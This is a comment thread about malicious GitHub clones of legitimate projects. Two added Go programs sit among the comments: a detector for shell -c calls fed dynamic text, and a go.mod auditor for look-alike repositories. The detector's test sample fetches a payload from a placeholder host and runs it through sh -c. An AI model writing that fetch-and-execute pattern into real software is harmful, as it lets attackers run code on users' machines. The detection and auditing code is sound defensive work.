What a garbage clickbait thread. From scary words like "attack", "infected", etc. you would think projects are compromised. But nothing is compromised. From wayyyyy down in the thread:<p>> The attacker creates FAKE orgs/repos and pushes clones of LEGIT projects to github.<p>Yeah, anyone can push anything to their own GitHub accounts/orgs, including malware. We know that.<p>Save yourself some time. Flagged.
This code does more than leak environments. The Go code pulls down arbitrary text and passes it to sh -c; example: <a href="https://github.com/zerops-io/zcli/commit/0396ee57bc0e5e0b12323aac7a240c4563488f9b#diff-c444f711e9191b53952edb65bfd8c644419fc7695c62611dc0fb304b4fb197d6R50" rel="nofollow">https://github.com/zerops-io/zcli/commit/0396ee57bc0e5e0b123...</a>
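The pattern the comment above describes (fetch text over the network, hand it to a shell with -c) is easy to find statically once you look for a non-literal third argument. The Go program below is an added example, not code from the thread or from any of the repositories it discusses: it walks the AST of a Go file and reports every exec.Command / exec.CommandContext call whose first two arguments are a shell and "-c" and whose third argument is not a string literal. The shell names checked and the sample source it scans are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// Finding is one call site that hands a non-literal string to a shell via -c.
type Finding struct {
	Line   int
	Callee string
}

// shellNames lists interpreters whose "-c" argument is executed as code (assumed list).
var shellNames = map[string]bool{"sh": true, "bash": true, "/bin/sh": true, "/bin/bash": true}

// isStringLit reports whether e is the double-quoted string literal "want".
func isStringLit(e ast.Expr, want string) bool {
	lit, ok := e.(*ast.BasicLit)
	return ok && lit.Kind == token.STRING && lit.Value == `"`+want+`"`
}

// FindDynamicShell parses Go source and reports calls of the shape
// exec.Command(<shell>, "-c", <non-literal>). A fixed string as the third
// argument is not reported: it cannot be swapped for fetched text at run time.
func FindDynamicShell(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var out []Finding
	ast.Inspect(file, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		sel, ok := call.Fun.(*ast.SelectorExpr)
		if !ok {
			return true
		}
		pkg, ok := sel.X.(*ast.Ident)
		if !ok || pkg.Name != "exec" {
			return true
		}
		args := call.Args
		switch sel.Sel.Name {
		case "Command":
		case "CommandContext":
			if len(args) == 0 {
				return true
			}
			args = args[1:] // drop the ctx argument so the shape matches Command
		default:
			return true
		}
		if len(args) < 3 || !isStringLit(args[1], "-c") {
			return true
		}
		isShell := false
		for name := range shellNames {
			if isStringLit(args[0], name) {
				isShell = true
				break
			}
		}
		if _, fixed := args[2].(*ast.BasicLit); !isShell || fixed {
			return true
		}
		out = append(out, Finding{Line: fset.Position(call.Pos()).Line, Callee: "exec." + sel.Sel.Name})
		return true
	})
	return out, nil
}

// sample is a constructed file mimicking the fetch-then-sh -c pattern; not real project code.
const sample = `package main

import (
	"io"
	"net/http"
	"os/exec"
)

func run() {
	resp, _ := http.Get("https://example.invalid/payload")
	body, _ := io.ReadAll(resp.Body)
	exec.Command("sh", "-c", string(body)).Run() // fetched text -> shell: reported
	exec.Command("sh", "-c", "echo hello").Run() // fixed string: not reported
	exec.Command("ls", "-la").Run()              // not a shell: not reported
}
`

func main() {
	findings, err := FindDynamicShell("sample.go", sample)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("sample.go:%d %s(shell, \"-c\", <dynamic>)\n", f.Line, f.Callee)
	}
}
```

Run it over a checkout with a directory walk and parser.ParseFile per .go file; the single hit in the constructed sample is line 12, the call that feeds the HTTP body to the shell.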
Note that it's 35,613 code results, not 35k repos<p>And 13K of the search results come from this org<p><a href="https://github.com/redhat-operator-ecosystem" rel="nofollow">https://github.com/redhat-operator-ecosystem</a>
This is a consequence of centralization. The canonical project sites and repositories should not be on GitHub.<p>Fanatics who believe otherwise will still clone those projects so that they are on sacred ground, but the practice should be frowned upon and fought against.<p>Another detrimental effect of GitHub is that they have trained users to accept public "forks" (a misnomer) as the usual way to contribute even trivial patches.
This lowers the bar for accepting and trusting non-official repositories.<p>GitHub has devalued the brand of large projects and has introduced the age of industrialized software development by creating an addictive environment where software politicians thrive by manipulating their social networks and working on their personal brand.
This is that thing where people can put anyone in as the commit author, thus impersonating the original creator, right?<p>Seems like the solution is "don't just copy random github urls into your code"?
While browsing the nanobox repo linked in the twitter thread I started to get 404s, so it looks like GitHub is on it. Edit: other repos have vanished as well now.
How would code like this make it into so many repos? People accepting pull requests and not properly reviewing them? Or is there something even worse about this attack?
TL;DR: These are forks by unknown people containing malware. I see no indication in the linked thread of even a single successful compromise actually occurring, or malicious code making it into legitimate upstream projects.
How is this affecting people if the clone does not open PRs to the original one?<p>So this will send data to the hacker's network if we clone and build the wrong repo, right?
Oh dear. This is a gigantic disaster.<p>If lots of software released today hasn't been pinning its versions on release (especially Electron apps) or signing its commits if it is open-source, then this is a chaotic supply chain attack waiting to happen and is worse than I thought.<p>But really it is yet another reason to avoid GitHub entirely and just self-host using GitLab or Gitea.
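Since the thread keeps coming back to "you only get hit if you build or depend on the wrong repo", a concrete check is to audit what a go.mod actually points at: a known project name living under an unfamiliar org, or a replace directive that silently swaps a canonical module for someone's copy. The program below is an added example, not code from the thread or from any project it mentions. The canonicalOrg table, the org and repo names, and the sample go.mod are all constructed for illustration; a real deployment would maintain its own curated table.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Finding is one go.mod entry that points somewhere other than the canonical repo.
type Finding struct {
	Directive string // "require" or "replace"
	Module    string
	Reason    string
}

// canonicalOrg maps a repository name to the GitHub org that publishes it.
// Assumed entries for the example; curate this list for your own dependency set.
var canonicalOrg = map[string]string{
	"widget": "acme",
	"gadget": "acme",
}

// githubOrgRepo splits github.com/<org>/<repo>[/sub] into org and repo.
func githubOrgRepo(path string) (org, repo string, ok bool) {
	parts := strings.Split(path, "/")
	if len(parts) < 3 || parts[0] != "github.com" {
		return "", "", false
	}
	return parts[1], parts[2], true
}

// checkRequire flags a known repo name that lives under an unexpected org.
func checkRequire(path string) *Finding {
	org, repo, ok := githubOrgRepo(path)
	if !ok {
		return nil
	}
	if want, known := canonicalOrg[repo]; known && org != want {
		return &Finding{Directive: "require", Module: path,
			Reason: fmt.Sprintf("%s is published by %s, not %s", repo, want, org)}
	}
	return nil
}

// checkReplace flags a GitHub module redirected to a different org, repo or host.
func checkReplace(from, to string) *Finding {
	fromOrg, fromRepo, ok := githubOrgRepo(from)
	if !ok {
		return nil
	}
	toOrg, toRepo, ok := githubOrgRepo(to)
	if !ok || fromOrg != toOrg || fromRepo != toRepo {
		return &Finding{Directive: "replace", Module: from, Reason: "redirected to " + to}
	}
	return nil
}

// AuditGoMod scans go.mod text, handling single-line and ( ... ) block forms.
func AuditGoMod(src string) []Finding {
	var out []Finding
	add := func(f *Finding) {
		if f != nil {
			out = append(out, *f)
		}
	}
	block := "" // "require" or "replace" while inside a parenthesised block
	sc := bufio.NewScanner(strings.NewReader(src))
	for sc.Scan() {
		line := sc.Text()
		if i := strings.Index(line, "//"); i >= 0 {
			line = line[:i] // strip trailing comments such as "// indirect"
		}
		fields := strings.Fields(line)
		if len(fields) == 0 {
			continue
		}
		switch {
		case len(fields) == 2 && fields[1] == "(" && (fields[0] == "require" || fields[0] == "replace"):
			block = fields[0]
		case fields[0] == ")":
			block = ""
		case fields[0] == "require" && len(fields) >= 2:
			add(checkRequire(fields[1]))
		case block == "require":
			add(checkRequire(fields[0]))
		case fields[0] == "replace" || block == "replace":
			if fields[0] == "replace" {
				fields = fields[1:]
			}
			arrow := -1 // layout is: from [version] => to [version]
			for i, f := range fields {
				if f == "=>" {
					arrow = i
				}
			}
			if arrow < 1 || arrow+1 >= len(fields) {
				continue
			}
			add(checkReplace(fields[0], fields[arrow+1]))
		}
	}
	return out
}

// sampleGoMod is a constructed go.mod, not taken from any real project.
const sampleGoMod = `module example.com/app

go 1.21

require (
	github.com/acme/widget v1.4.0
	github.com/acme-io/gadget v0.9.1 // look-alike org
	github.com/other/thing v2.0.0
)

replace github.com/acme/widget => github.com/acme-mirror/widget v1.4.0-patched
`

func main() {
	for _, f := range AuditGoMod(sampleGoMod) {
		fmt.Printf("%s %s: %s\n", f.Directive, f.Module, f.Reason)
	}
}
```

On the constructed sample it reports two entries: the gadget require under acme-io instead of acme, and the replace that sends widget to acme-mirror. Neither would be caught by version pinning alone, since both are pinned to an exact version of the wrong code.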